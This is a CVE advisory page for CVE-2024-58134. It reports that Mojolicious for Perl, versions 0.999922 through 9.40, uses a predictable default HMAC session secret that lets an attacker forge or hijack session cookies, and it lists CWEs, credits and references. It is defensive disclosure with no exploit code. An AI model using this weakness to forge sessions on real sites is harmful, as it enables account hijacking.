We use these services and cookies to improve your user experience. You may opt out if you wish, however, this may limit some features on this site.

Please see our statement on Data Privacy.

Crisp.chat (Helpdesk and Chat)

Ok

THREATINT
PUBLISHED

CVE-2024-58134

Mojolicious versions from 0.999922 through 9.40 for Perl uses a hard coded string, or the application's class name, as a HMAC session secret by default



Description

Mojolicious versions from 0.999922 through 9.40 for Perl uses a hard coded string, or the application's class name, as a HMAC session secret by default. These predictable default secrets can be exploited to forge session cookies. An attacker who knows or guesses the secret could compute valid HMAC signatures for the session cookie, allowing them to tamper with or hijack another user’s session.

Reserved 2025-04-07 | Published 2025-05-03 | Updated 2025-05-12 | Assigner CPANSec

Problem types

CWE-321 Use of Hard-coded Cryptographic Key

CWE-331 Insufficient Entropy

Product status

Default status
unaffected

0.999922
affected

Credits

Antoine Cervoise from Synacktiv analyst

Jakub Kramarz analyst

Lukas Atkinson analyst

References

github.com/mojolicious/mojo/pull/1791

github.com/mojolicious/mojo/pull/2200

www.synacktiv.com/publications/baking-mojolicious-cookies

medium.com/...rity-problems-through-security-by-13da7c225802

metacpan.org/...I/Mojolicious-9.39/source/lib/Mojolicious.pm

github.com/hashcat/hashcat/pull/4090

cve.org (CVE-2024-58134)

nvd.nist.gov (CVE-2024-58134)

Download JSON

Share this page
https://cve.threatint.eu/CVE/CVE-2024-58134

Support options

Helpdesk Chat, Email, Knowledgebase
© Copyright 2025 THREATINT
Made in Cyprus with +
 System status
Find us on
Data Privacy
Terms of Use
Logo BSI Allianz für Cyber-Sicherheit
Error loading Crisp.chat. Please check your web content filter and browser plugins.